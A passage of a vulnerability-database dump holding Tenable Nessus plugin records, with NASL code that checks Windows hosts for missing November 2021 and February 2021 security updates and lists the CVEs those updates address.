\"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSKB\", value:\"5007215\");\n script_xref(name:\"MSFT\", value:\"MS21-5007215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5007215: Windows 11 Security Updates (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42276,\n CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007215\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007215 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007215');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n rollup_date:'11_2021',\n os_build:'22000',\n bulletin:bulletin,\n rollup_kb_list:[5007215])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:17", "description": "The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42284)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007189: Windows 10 Version 1909 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42288"], "modified": "2022-11-21T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007189.NASL", "href": "https://www.tenable.com/plugins/nessus/154989", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154989);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/21\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42288\"\n );\n script_xref(name:\"MSKB\", value:\"5007189\");\n script_xref(name:\"MSFT\", value:\"MS21-5007189\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007189: Windows 10 Version 1909 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007189\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007189.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007189');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007189])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:01", "description": "The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007192.NASL", "href": "https://www.tenable.com/plugins/nessus/154990", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154990);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007192\");\n script_xref(name:\"MSFT\", value:\"MS21-5007192\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007192\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007192.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007192');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007192])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:12", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n 